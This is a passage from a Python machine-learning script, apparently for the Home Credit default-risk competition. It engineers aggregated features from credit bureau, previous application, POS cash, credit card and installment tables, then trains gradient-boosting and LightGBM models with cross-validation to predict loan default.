'AMT_CREDIT_SUM_LIMIT': ['sum', 'mean'], \n 'AMT_CREDIT_SUM_OVERDUE': ['sum', 'mean'], \n 'AMT_ANNUITY': ['sum', 'max', 'mean'],\n 'PAYMENT_RATE': ['min', 'max', 'sum']\n }\n \n \n bureau_features = bureau.groupby('SK_ID_CURR').agg({**agg_dict, **cat_aggregations})\n bureau_features.columns = pd.Index(['BURO_' + e[0] + \"_\" + e[1].upper() for e in bureau_features.columns.tolist()])\n bureau_features = bureau_features.reset_index()\n \n # Bureau: Active credits - using only numerical aggregations\n active = bureau[bureau['CREDIT_ACTIVE_Active'] == 1]\n active_agg = active.groupby('SK_ID_CURR').agg(agg_dict)\n active_agg.columns = pd.Index(['ACTIVE_' + e[0] + \"_\" + e[1].upper() for e in active_agg.columns.tolist()])\n active_agg = active_agg.reset_index()\n \n bureau_features = pd.merge(bureau_features, active_agg, how='left', on='SK_ID_CURR')\n \n del active, active_agg\n gc.collect()\n \n # Bureau: Closed credits - using only numerical aggregations\n closed = bureau[bureau['CREDIT_ACTIVE_Closed'] == 1]\n closed_agg = closed.groupby('SK_ID_CURR').agg(agg_dict)\n closed_agg.columns = pd.Index(['CLOSED_' + e[0] + \"_\" + e[1].upper() for e in closed_agg.columns.tolist()])\n closed_agg = closed_agg.reset_index()\n \n bureau_features = pd.merge(bureau_features, closed_agg, how='left', on='SK_ID_CURR')\n \n \n del bureau, closed, closed_agg\n gc.collect()\n \n return bureau_features\n\ndef add_bureau_features(df, important_columns, mode):\n bureau_features = get_bureau_features()\n df = pd.merge(df, bureau_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(bureau_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n#########################################\n# bureau_balance_features\n#########################################\ndef get_bureau_balance_features(nan_as_category=False):\n bureau_balance = pd.read_csv('bureau_balance.csv')\n bureau_balance, bb_cat = one_hot_encoder(bureau_balance, nan_as_category)\n\n agg_dict = {'MONTHS_BALANCE': ['min', 'max', 'size']}\n for col in bb_cat:\n agg_dict[col] = ['mean', 'count', 'sum']\n \n 
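# two-stage rollup: aggregate the monthly rows per SK_ID_BUREAU first, then join back to bureau.csv and aggregate those per-loan features again per SK_ID_CURR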
bureau_balance_agg = bureau_balance.groupby(['SK_ID_BUREAU']).agg(agg_dict).reset_index()\n bureau_balance_agg.columns = pd.Index(['BURO_BB_' + e[0] + \"_\" + e[1].upper() for e in bureau_balance_agg.columns.tolist()])\n\n \n del bureau_balance\n gc.collect()\n \n bureau = pd.read_csv('bureau.csv')\n \n bureau_balance_agg = pd.merge(bureau[['SK_ID_BUREAU', 'SK_ID_CURR']], bureau_balance_agg, left_on='SK_ID_BUREAU', right_on='BURO_BB_SK_ID_BUREAU_', how='left')\n \n del bureau\n gc.collect()\n \n agg_dict = { 'BURO_BB_STATUS_0_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_0_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_1_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_1_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_2_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_2_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_3_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_3_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_4_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_4_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_5_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_5_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_C_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_C_COUNT': ['mean', 'sum'], \n 'BURO_BB_STATUS_X_MEAN': ['mean', 'sum'], \n 'BURO_BB_STATUS_X_COUNT': ['mean', 'sum'], \n 'BURO_BB_MONTHS_BALANCE_MIN': ['min'],\n 'BURO_BB_MONTHS_BALANCE_MAX': ['max'],\n 'BURO_BB_MONTHS_BALANCE_SIZE': ['mean', 'sum']\n }\n bureau_balance_agg = bureau_balance_agg.groupby('SK_ID_CURR').agg(agg_dict).reset_index()\n bureau_balance_agg.columns = ['%s%s' % (a, '_%s' % b if b else '') for a, b in bureau_balance_agg.columns]\n \n return bureau_balance_agg\n\ndef add_bureau_balance_features(df, important_columns, mode):\n bureau_balance_features = get_bureau_balance_features()\n df = pd.merge(df, bureau_balance_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(bureau_balance_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n#########################################\n# previous application\n#########################################\n# Preprocess previous_applications.csv\ndef get_previous_applications_features(nan_as_category=False):\n prev = pd.read_csv('previous_application.csv')\n \n # removing the duplicate applications\n # Not working\n #prev = prev[(prev.NFLAG_LAST_APPL_IN_DAY == 1) & (prev.FLAG_LAST_APPL_PER_CONTRACT == 'Y')]\n \n prev, cat_cols = one_hot_encoder(prev, nan_as_category= True)\n\n # Days 365243 values -> nan\n \n prev['DAYS_FIRST_DRAWING'].replace(365243, np.nan, inplace= True)\n prev['DAYS_FIRST_DUE'].replace(365243, np.nan, inplace= True)\n prev['DAYS_LAST_DUE_1ST_VERSION'].replace(365243, np.nan, inplace= True)\n prev['DAYS_LAST_DUE'].replace(365243, np.nan, inplace= True)\n prev['DAYS_TERMINATION'].replace(365243, np.nan, inplace= True)\n # Add feature: value ask / value received percentage\n \n prev['APP_CREDIT_PERC'] = 0\n prev.loc[prev['AMT_CREDIT'] != 0, 'APP_CREDIT_PERC'] = prev.loc[prev['AMT_CREDIT'] != 0,'AMT_APPLICATION'] / prev.loc[prev['AMT_CREDIT'] !=0, 'AMT_CREDIT']\n \n prev['PAYMENT_RATE'] = prev['AMT_ANNUITY'] / prev['AMT_CREDIT']\n prev['CREDIT_TO_GOODS_RATIO'] = prev['AMT_CREDIT'] / prev['AMT_GOODS_PRICE']\n\n\n # Previous applications numeric features\n num_aggregations = {\n 'SK_ID_PREV': ['count'],\n 'AMT_ANNUITY': ['min', 'max', 'mean', 'sum'],\n 'AMT_APPLICATION': ['min', 'max', 'mean', 'sum'],\n 'AMT_CREDIT': ['min', 'max', 'mean', 'sum'],\n 'APP_CREDIT_PERC': ['min', 'max', 'mean', 'var'],\n 
'AMT_DOWN_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'AMT_GOODS_PRICE': ['min', 'max', 'mean', 'sum'],\n 'HOUR_APPR_PROCESS_START': ['min', 'max', 'mean'],\n 'RATE_DOWN_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'DAYS_DECISION': ['min', 'max', 'mean'],\n 'CNT_PAYMENT': ['mean', 'sum'],\n 'PAYMENT_RATE': ['min', 'max', 'mean'],\n 'CREDIT_TO_GOODS_RATIO': ['min', 'max', 'mean']\n }\n \n # Previous applications categorical features\n cat_aggregations = {}\n for cat in cat_cols:\n cat_aggregations[cat] = ['mean', 'sum']\n\n prev_agg = prev.groupby('SK_ID_CURR').agg({**num_aggregations, **cat_aggregations})\n prev_agg.columns = pd.Index(['PREV_' + e[0] + \"_\" + e[1].upper() for e in prev_agg.columns.tolist()])\n prev_agg = prev_agg.reset_index()\n\n # Previous Applications: Approved Applications - only numerical features\n approved = prev[prev['NAME_CONTRACT_STATUS_Approved'] == 1]\n approved_agg = approved.groupby('SK_ID_CURR').agg(num_aggregations)\n approved_agg.columns = pd.Index(['APPROVED_' + e[0] + \"_\" + e[1].upper() for e in approved_agg.columns.tolist()])\n approved_agg = approved_agg.reset_index()\n\n prev_agg = pd.merge(prev_agg, approved_agg, how='left', on='SK_ID_CURR')\n \n # Previous Applications: Refused Applications - only numerical features\n refused = prev[prev['NAME_CONTRACT_STATUS_Refused'] == 1]\n refused_agg = refused.groupby('SK_ID_CURR').agg(num_aggregations)\n refused_agg.columns = pd.Index(['REFUSED_' + e[0] + \"_\" + e[1].upper() for e in refused_agg.columns.tolist()])\n refused_agg = refused_agg.reset_index()\n\n prev_agg = pd.merge(prev_agg, refused_agg, how='left', on='SK_ID_CURR')\n \n del refused, refused_agg, approved, approved_agg, prev\n gc.collect()\n \n return prev_agg\n\ndef add_previous_applications_features(df, important_columns, mode):\n previous_applications_features = get_previous_applications_features()\n df = pd.merge(df, previous_applications_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(previous_applications_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n\n#########################################\n# POS Cash\n#########################################\ndef get_pos_cash_features():\n pos = pd.read_csv('POS_CASH_balance.csv')\n pos, cat_cols = one_hot_encoder(pos, nan_as_category= True)\n \n pos['SK_DPD_6_months'] = 0 \n pos.loc[pos.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_6_months'] = pos.loc[pos.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD'] \n \n pos['SK_DPD_DEF_6_months'] = 0 \n pos.loc[pos.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_DEF_6_months'] = pos.loc[pos.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_DEF'] \n \n # Features\n aggregations = {\n 'MONTHS_BALANCE': ['max', 'mean', 'size'],\n 'SK_DPD': ['max', 'mean'],\n 'SK_DPD_DEF': ['max', 'mean'],\n 'SK_DPD_6_months': ['max','mean'],\n 'SK_DPD_DEF_6_months': ['max', 'mean'],\n 'CNT_INSTALMENT': ['min', 'max', 'mean', 'sum'],\n 'CNT_INSTALMENT_FUTURE': ['min', 'max', 'mean', 'sum']\n }\n \n for cat in cat_cols:\n aggregations[cat] = ['mean', 'sum']\n \n \n pos_agg = pos.groupby('SK_ID_CURR').agg(aggregations)\n pos_agg.columns = pd.Index(['POS_' + e[0] + \"_\" + e[1].upper() for e in pos_agg.columns.tolist()])\n pos_agg = pos_agg.reset_index()\n\n pos_dpd_slope = pos.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'SK_DPD'].apply(linear_fit)\n pos_dpd_slope = pos_dpd_slope.reset_index()\n pos_dpd_slope.columns = ['SK_ID_CURR', 
'POS_DPD_SLOPE']\n \n pos_agg = pd.merge(pos_agg, pos_dpd_slope, on='SK_ID_CURR', how='left')\n \n pos_dpd_def_slope = pos.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'SK_DPD_DEF'].apply(linear_fit)\n pos_dpd_def_slope = pos_dpd_def_slope.reset_index()\n pos_dpd_def_slope.columns = ['SK_ID_CURR', 'POS_DPD_DEF_SLOPE']\n \n pos_agg = pd.merge(pos_agg, pos_dpd_def_slope, on='SK_ID_CURR', how='left')\n\n del pos, pos_dpd_slope, pos_dpd_def_slope\n gc.collect()\n \n return pos_agg\n\n\ndef add_pos_cash_features(df, important_columns, mode):\n pos_cash_features = get_pos_cash_features()\n df = pd.merge(df, pos_cash_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(pos_cash_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n######################################################\n# Preprocess credit_card_balance.csv\n######################################################\ndef get_credit_card_balance_features():\n cc = pd.read_csv('credit_card_balance.csv')\n cc, cat_cols = one_hot_encoder(cc, nan_as_category= True)\n \n cc['OVER_DRAFT'] = cc['AMT_TOTAL_RECEIVABLE']/cc['AMT_CREDIT_LIMIT_ACTUAL']\n cc['OVER_PAYMENT'] = cc['AMT_PAYMENT_CURRENT']/cc['AMT_INST_MIN_REGULARITY']\n cc['INTEREST'] = cc['AMT_TOTAL_RECEIVABLE']/cc['AMT_RECEIVABLE_PRINCIPAL']\n \n \"\"\"\n cc['SK_DPD_6_months'] = 0 \n cc.loc[cc.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_6_months'] = cc.loc[cc.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD'] \n \n cc['SK_DPD_DEF_6_months'] = 0 \n cc.loc[cc.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_DEF_6_months'] = cc.loc[cc.MONTHS_BALANCE.isin([-1, -2, -3, -4, -5, -6]), 'SK_DPD_DEF'] \n \"\"\"\n \n # General aggregations\n cc.drop(['SK_ID_PREV'], axis= 1, inplace = True)\n cc_agg = cc.groupby('SK_ID_CURR').agg(['min', 'max', 'mean', 'sum', 'var'])\n cc_agg.columns = pd.Index(['CC_' + e[0] + \"_\" + e[1].upper() for e in cc_agg.columns.tolist()])\n \n # Count credit card lines\n cc_agg['CC_COUNT'] = cc.groupby('SK_ID_CURR').size()\n cc_agg = cc_agg.reset_index() \n \n cc_over_draft_slope = cc.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'OVER_DRAFT'].apply(linear_fit)\n cc_over_draft_slope = cc_over_draft_slope.reset_index()\n cc_over_draft_slope.columns = ['SK_ID_CURR', 'CC_OVER_DRAFT_SLOPE']\n \n cc_agg = pd.merge(cc_agg, cc_over_draft_slope, on='SK_ID_CURR', how='left')\n\n cc_over_payment_slope = cc.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'OVER_PAYMENT'].apply(linear_fit)\n cc_over_payment_slope = cc_over_payment_slope.reset_index()\n cc_over_payment_slope.columns = ['SK_ID_CURR', 'CC_OVER_PAYMENT_SLOPE']\n \n cc_agg = pd.merge(cc_agg, cc_over_payment_slope, on='SK_ID_CURR', how='left')\n \n cc_interest_slope = cc.groupby('SK_ID_CURR')['MONTHS_BALANCE', 'INTEREST'].apply(linear_fit)\n cc_interest_slope = cc_interest_slope.reset_index()\n cc_interest_slope.columns = ['SK_ID_CURR', 'CC_INTEREST_SLOPE']\n \n cc_agg = pd.merge(cc_agg, cc_interest_slope, on='SK_ID_CURR', how='left')\n \n \n del cc\n gc.collect()\n \n return cc_agg\n\ndef add_credit_card_balance_features(df, important_columns, mode):\n credit_card_balance = get_credit_card_balance_features()\n df = pd.merge(df, credit_card_balance, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(credit_card_balance.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n 
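# ------------------------------------------------------------------
# Aside (illustration only, not part of the original pipeline): the slope
# features above (POS_DPD_SLOPE, CC_OVER_DRAFT_SLOPE, CC_INTEREST_SLOPE, ...)
# all follow one pattern: group a monthly series per SK_ID_CURR and keep the
# linear-regression slope as a single trend feature. A minimal self-contained
# sketch of that pattern on made-up toy data (the ids and values below are
# invented, not taken from the competition files):
# ------------------------------------------------------------------
import pandas as pd
from scipy import stats

def slope_of(df):
    # regress the value column (second) on the time column (first)
    x = df[df.columns[0]].values
    y = df[df.columns[1]].values
    return stats.linregress(x, y).slope

toy = pd.DataFrame({
    'SK_ID_CURR':     [1, 1, 1, 2, 2, 2],
    'MONTHS_BALANCE': [-3, -2, -1, -3, -2, -1],
    'SK_DPD':         [0, 2, 4, 5, 3, 1],  # client 1 worsens, client 2 improves
})
trend = toy.groupby('SK_ID_CURR')[['MONTHS_BALANCE', 'SK_DPD']].apply(slope_of)
print(trend)  # SK_ID_CURR 1 -> 2.0, 2 -> -2.0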
\n#########################################################\n# Preprocess installments_payments.csv\n########################################################\ndef get_installments_payments_features():\n ins = pd.read_csv('installments_payments.csv')\n ins, cat_cols = one_hot_encoder(ins, nan_as_category= True)\n\n # Percentage and difference paid in each installment (amount paid and installment value)\n ins['PAYMENT_PERC'] = 0\n ins.loc[ins['AMT_INSTALMENT'] !=0, 'PAYMENT_PERC'] = ins.loc[ins['AMT_INSTALMENT'] !=0, 'AMT_PAYMENT'] / ins.loc[ins['AMT_INSTALMENT'] !=0, 'AMT_INSTALMENT']\n \n ins['PAYMENT_DIFF'] = ins['AMT_INSTALMENT'] - ins['AMT_PAYMENT']\n # Days past due and days before due (no negative values)\n ins['DPD'] = ins['DAYS_ENTRY_PAYMENT'] - ins['DAYS_INSTALMENT']\n ins['DBD'] = ins['DAYS_INSTALMENT'] - ins['DAYS_ENTRY_PAYMENT']\n ins['DPD'] = ins['DPD'].apply(lambda x: x if x > 0 else 0)\n ins['DBD'] = ins['DBD'].apply(lambda x: x if x > 0 else 0)\n \n # number of less payments done\n ins['NLP_Y'] = ins['PAYMENT_DIFF'].apply(lambda x: 1 if x > 0 else 0)\n ins['DPD_Y'] = ins['DPD'].apply(lambda x: 1 if x > 0 else 0)\n ins['DBD_Y'] = ins['DBD'].apply(lambda x: 1 if x > 0 else 0)\n \n ins['DPD_400'] = 0 \n ins.loc[ins.DAYS_INSTALMENT >= -400, 'DPD_400'] = ins.loc[ins.DAYS_INSTALMENT >= -400, 'DPD'] \n \n ins['DPD_800'] = 0\n ins.loc[ins.DAYS_INSTALMENT >= -800, 'DPD_800'] = ins.loc[ins.DAYS_INSTALMENT >= -800, 'DPD'] \n \n # Features: Perform aggregations\n aggregations = {\n 'NUM_INSTALMENT_VERSION': ['nunique'],\n 'DPD': ['max', 'mean', 'sum'],\n 'DBD': ['max', 'mean', 'sum'],\n 'DPD_400': ['max', 'mean', 'sum'],\n 'DPD_800': ['max', 'mean', 'sum'],\n # 'NLP_Y': ['max', 'mean', 'sum'],\n # 'DPD_Y': ['max', 'mean', 'sum'],\n # 'DBD_Y': ['max', 'mean', 'sum'],\n 'PAYMENT_PERC': ['max', 'mean', 'sum', 'var'],\n 'PAYMENT_DIFF': ['max', 'mean', 'sum', 'var'],\n 'AMT_INSTALMENT': ['max', 'mean', 'sum'],\n 'AMT_PAYMENT': ['min', 'max', 'mean', 'sum'],\n 'DAYS_ENTRY_PAYMENT': ['max', 'mean', 'sum']\n }\n\n for cat in cat_cols:\n aggregations[cat] = ['mean', 'sum']\n \n ins_agg = ins.groupby('SK_ID_CURR').agg(aggregations)\n ins_agg.columns = pd.Index(['INSTALL_' + e[0] + \"_\" + e[1].upper() for e in ins_agg.columns.tolist()])\n # Count installments accounts\n ins_agg['INSTAL_COUNT'] = ins.groupby('SK_ID_CURR').size()\n ins_agg = ins_agg.reset_index()\n\n ins_slope = ins[~ins.DAYS_ENTRY_PAYMENT.isnull()].groupby('SK_ID_CURR')['DAYS_ENTRY_PAYMENT', 'DPD'].apply(linear_fit)\n ins_slope = ins_slope.reset_index()\n ins_slope.columns = ['SK_ID_CURR', 'INSTALL_DPD_SLOPE']\n \n ins_agg = pd.merge(ins_agg, ins_slope, on='SK_ID_CURR', how='left')\n \n del ins\n gc.collect()\n \n return ins_agg\n\ndef add_installments_payments_features(df, important_columns, mode):\n installments_payments_features = get_installments_payments_features()\n df = pd.merge(df, installments_payments_features, on='SK_ID_CURR', how='left')\n \n if mode != 'test':\n added_columns = list(installments_payments_features.columns)\n added_columns.remove('SK_ID_CURR')\n important_columns.extend(added_columns)\n \n return df, important_columns\n\n#########################################\n# split train dev sets\n#########################################\ndef get_train_dev_data(application_train, y_true, important_columns):\n \n train_all_skid, dev_all_skid, dev_eyeball_skid = get_train_dev_sets()\n X_train = application_train.loc[application_train.SK_ID_CURR.isin(train_all_skid), important_columns].fillna(0)\n y_train = 
y_true.loc[y_true.SK_ID_CURR.isin(train_all_skid), 'TARGET']\n X_dev = application_train.loc[application_train.SK_ID_CURR.isin(dev_all_skid), important_columns].fillna(0)\n y_dev = y_true.loc[y_true.SK_ID_CURR.isin(dev_all_skid), 'TARGET']\n\n return X_train, y_train,X_dev, y_dev\n\n\nclass SklearnWrapper(object):\n def __init__(self, clf, seed=0, params=None):\n params['random_state'] = seed\n self.clf = clf(**params)\n\n def train(self, x_train, y_train):\n self.clf.fit(x_train, y_train)\n\n def predict(self, x):\n return self.clf.predict_proba(x)[:,1]\n \nclass LightGBMWrapper(object):\n def __init__(self, clf, seed=0, params=None):\n params['feature_fraction_seed'] = seed\n params['bagging_seed'] = seed\n self.clf = clf(**params)\n\n def train(self, x_train, y_train):\n self.clf.fit(x_train, y_train)\n\n def predict(self, x):\n return self.clf.predict_proba(x)[:,1]\n\n\nclass XgbWrapper(object):\n def __init__(self, seed=0, params=None):\n self.param = params\n self.param['seed'] = seed\n self.nrounds = params.pop('nrounds', 250)\n\n def train(self, x_train, y_train):\n dtrain = xgb.DMatrix(x_train, label=y_train)\n self.gbdt = xgb.train(self.param, dtrain, self.nrounds, verbose_eval=True)\n\n def predict(self, x):\n return self.gbdt.predict(xgb.DMatrix(x))\n\n\ndef get_oof(clf, kf, NFOLDS, X_train, y_train, X_dev, y_dev, application_test):\n ntrain = X_train.shape[0]\n ndev = X_dev.shape[0]\n ntest = application_test.shape[0]\n\n oof_train = np.zeros((ntrain,))\n oof_dev = np.zeros((ndev,))\n oof_dev_skf = np.empty((NFOLDS, ndev))\n oof_test = np.zeros((ntest,))\n oof_test_skf = np.empty((NFOLDS, ntest))\n\n for i, (train_index, test_index) in enumerate(kf.split(X_train, y_train)):\n x_tr = X_train.iloc[train_index]\n y_tr = y_train.iloc[train_index]\n x_te = X_train.iloc[test_index]\n\n clf.train(x_tr, y_tr)\n\n oof_train[test_index] = clf.predict(x_te)\n oof_dev_skf[i, :] = clf.predict(X_dev)\n oof_test_skf[i, :] = clf.predict(application_test)\n\n oof_test[:] = oof_test_skf.mean(axis=0)\n oof_dev[:] = oof_dev_skf.mean(axis=0)\n\n return oof_train.reshape(-1, 1), oof_dev.reshape(-1, 1), oof_test.reshape(-1, 1)\n\ndef GBC_train(X_train, y_train, X_dev, y_dev, estimators):\n clf = GradientBoostingClassifier(n_estimators=estimators, random_state=0)\n clf.fit(X_train, y_train)\n\n ###################################################\n # results on the train set\n ###################################################\n \n y_train_predict = clf.predict(X_train)\n y_train_predict_proba = clf.predict_proba(X_train)\n \n scores_df = get_scores(y_train, y_train_predict, y_train_predict_proba[:, 1], 'train')\n \n ###################################################\n # results on the dev set\n ###################################################\n \n y_dev_predict = clf.predict(X_dev)\n y_dev_predict_proba = clf.predict_proba(X_dev)\n \n # get dev scores\n scores_df = scores_df.append(get_scores(y_dev, y_dev_predict, y_dev_predict_proba[:, 1], 'test'))\n \n return clf, scores_df\n\ndef LGBM_train_cv(application_train, usecols, params, dropcols, model, version, desc, algo, estimators):\n dtrain = lgb.Dataset(application_train[usecols].drop(dropcols, axis=1), application_train['TARGET'])\n eval_ = lgb.cv(params,\n dtrain,\n nfold=5,\n stratified=True,\n num_boost_round=20000,\n early_stopping_rounds=200,\n metrics='auc',\n verbose_eval=100,\n seed = 5,\n show_stdv=True)\n \n with open('all_reasults.csv', 'a') as f:\n spamwriter = csv.writer(f)\n spamwriter.writerow([model,\n version,\n desc,\n 
algo,\n algo+\"(n_estimators=\"+str(estimators)+\" random_state=0)\",\n str(round(max(eval_['auc-mean']), 4)),'',\n '','',\n '','',\n \"NA\",\"NA\",\"dev set\",\n '','',\n '','',\n '',''])\n \n return max(eval_['auc-mean'])\n \n\ndef LGBM_train(X_train, y_train, X_dev, y_dev, estimators):\n clf = LGBMClassifier(\n nthread=8,\n n_estimators=10000,\n learning_rate=0.02,\n num_leaves=34,\n colsample_bytree=0.9497036,\n subsample=0.8715623,\n max_depth=8,\n reg_alpha=0.041545473,\n reg_lambda=0.0735294,\n min_split_gain=0.0222415,\n min_child_weight=39.3259775,\n silent=-1,\n verbose=-1, )\n \n clf.fit(X_train, y_train, eval_set=[(X_train, y_train), (X_dev, y_dev)], eval_metric= 'auc', verbose= 100, early_stopping_rounds= 200)\n\n ###################################################\n # results on the train set\n ###################################################\n \n y_train_predict_proba = clf.predict_proba(X_train, num_iteration=clf.best_iteration_)\n y_train_predict = (y_train_predict_proba[:, 1] > 0.5)*1 \n \n scores_df = get_scores(y_train, y_train_predict, y_train_predict_proba[:, 1], 'train')\n \n ###################################################\n # results on the dev set\n ###################################################\n y_dev_predict_proba = clf.predict_proba(X_dev, num_iteration=clf.best_iteration_)\n y_dev_predict = (y_dev_predict_proba[:, 1] > 0.5)*1 \n\n # get dev scores\n scores_df = scores_df.append(get_scores(y_dev, y_dev_predict, y_dev_predict_proba[:, 1], 'test'))\n \n return clf, scores_df\n \n\n#########################################\n# split train dev sets and train \n#########################################\ndef train_model(application_train, y_true, important_columns, model, version, estimators, desc, algo='GBC'):\n X_train, y_train, X_dev, y_dev = get_train_dev_data(application_train, y_true, important_columns)\n \n del application_train, y_true\n gc.collect()\n \n if algo == 'LGB':\n clf, scores_df = LGBM_train(X_train, y_train, X_dev, y_dev, estimators)\n else:\n clf, scores_df = GBC_train(X_train, y_train, X_dev, y_dev, estimators)\n\n with open('all_reasults.csv', 'a') as f:\n #f.write(model+\",\"+version+\",\"+\"GBC trained only on important columns of application data with dev set CV adding bureau features\"+\",\"+\"GradientBoostingClassifier\"+\",\"+str(clf)+\",\"+str(round(scores_df['test_roc_auc'], 4))+\",\"+str(round(scores_df['test_accuracy'], 4))+\",\"+str(round(scores_df['test_recall'], 4))+\",\"+str(round(scores_df['test_fpr'], 4))+\",\"+str(round(scores_df['test_precision'], 4))+\",\"+ str(round(scores_df['test_f1'], 4))+\",\"+\"NA\"+\",\"+\"NA\"+\",\"+\"dev set\"+\",\"+str(round(scores_df['train_roc_auc'], 4))+\",\"+str(round(scores_df['train_accuracy'], 4))+\",\"+str(round(scores_df['train_recall'], 4))+\",\"+str(round(scores_df['train_fpr'], 4))+\",\"+str(round(scores_df['train_precision'], 4))+\",\"+ str(round(scores_df['train_f1'], 4))+\"\\n\")\n\n spamwriter = csv.writer(f)\n spamwriter.writerow([model,\n version,\n desc,\n algo,\n algo+\"(n_estimators=\"+str(estimators)+\" random_state=0)\",\n str(round(scores_df['test_roc_auc'], 4)),str(round(scores_df['test_accuracy'], 4)),\n str(round(scores_df['test_recall'], 4)),str(round(scores_df['test_fpr'], 4)),\n str(round(scores_df['test_precision'], 4)),str(round(scores_df['test_f1'], 4)),\n \"NA\",\"NA\",\"dev set\",\n str(round(scores_df['train_roc_auc'], 4)),str(round(scores_df['train_accuracy'], 4)),\n str(round(scores_df['train_recall'], 4)),str(round(scores_df['train_fpr'], 4)),\n 
str(round(scores_df['train_precision'], 4)),str(round(scores_df['train_f1'], 4))])\n\n \n important_features = pd.Series(data=clf.feature_importances_*100,index=X_train.columns)\n return clf,important_features\n\n\n\n###################################################\n# K fold LGB\n###################################################\n# LightGBM GBDT with KFold or Stratified KFold\n# Parameters from Tilii kernel: https://www.kaggle.com/tilii7/olivier-lightgbm-parameters-by-bayesian-opt/code\n\ndef kfold_lightgbm(df, num_folds, submission_file_name, stratified = False, debug= False):\n # Divide in training/validation and test data\n train_df = df[df['TARGET'].notnull()]\n test_df = df[df['TARGET'].isnull()]\n print(\"Starting LightGBM. Train shape: {}, test shape: {}\".format(train_df.shape, test_df.shape))\n del df\n gc.collect()\n \n # Cross validation model\n if stratified:\n folds = StratifiedKFold(n_splits= num_folds, shuffle=True, random_state=1001)\n else:\n folds = KFold(n_splits= num_folds, shuffle=True, random_state=1001)\n \n # Create arrays and dataframes to store results\n oof_preds = np.zeros(train_df.shape[0])\n sub_preds = np.zeros(test_df.shape[0])\n feature_importance_df = pd.DataFrame()\n feats = [f for f in train_df.columns if f not in ['TARGET','SK_ID_CURR','SK_ID_BUREAU','SK_ID_PREV','index']]\n \n for n_fold, (train_idx, valid_idx) in enumerate(folds.split(train_df[feats], train_df['TARGET'])):\n train_x, train_y = train_df[feats].iloc[train_idx], train_df['TARGET'].iloc[train_idx]\n valid_x, valid_y = train_df[feats].iloc[valid_idx], train_df['TARGET'].iloc[valid_idx]\n\n # LightGBM parameters found by Bayesian optimization\n clf = LGBMClassifier(\n nthread=8,\n n_estimators=10000,\n learning_rate=0.02,\n num_leaves=34,\n colsample_bytree=0.9497036,\n subsample=0.8715623,\n max_depth=8,\n reg_alpha=0.041545473,\n reg_lambda=0.0735294,\n min_split_gain=0.0222415,\n min_child_weight=39.3259775,\n random_seed = 42,\n silent=-1,\n verbose=-1, )\n \n clf.fit(train_x, train_y, eval_set=[(train_x, train_y), (valid_x, valid_y)], \n eval_metric= 'auc', verbose= 100, early_stopping_rounds= 200)\n\n oof_preds[valid_idx] = clf.predict_proba(valid_x, num_iteration=clf.best_iteration_)[:, 1]\n sub_preds += clf.predict_proba(test_df[feats], num_iteration=clf.best_iteration_)[:, 1] / folds.n_splits\n\n fold_importance_df = pd.DataFrame()\n fold_importance_df[\"feature\"] = feats\n fold_importance_df[\"importance\"] = clf.feature_importances_\n fold_importance_df[\"fold\"] = n_fold + 1\n feature_importance_df = pd.concat([feature_importance_df, fold_importance_df], axis=0)\n print('Fold %2d AUC : %.6f' % (n_fold + 1, roc_auc_score(valid_y, oof_preds[valid_idx])))\n del clf, train_x, train_y, valid_x, valid_y\n gc.collect()\n\n\n print('Full AUC score %.6f' % roc_auc_score(train_df['TARGET'], oof_preds))\n oof_preds_pred = (oof_preds > 0.5)*1\n scores_df = get_scores(train_df['TARGET'], oof_preds_pred, oof_preds, 'test')\n print(scores_df)\n \n # Write submission file and plot feature importance\n if not debug:\n test_df['TARGET'] = sub_preds\n test_df[['SK_ID_CURR', 'TARGET']].to_csv(submission_file_name, index= False)\n\n return feature_importance_df\n\n############################################\n# train on all and generate submission file\n############################################\ndef generate_submission_file(clf, application_train, application_test, y_true, important_columns, name):\n X = application_train[important_columns].fillna(0)\n y = y_true['TARGET']\n clf.fit(X, y, 
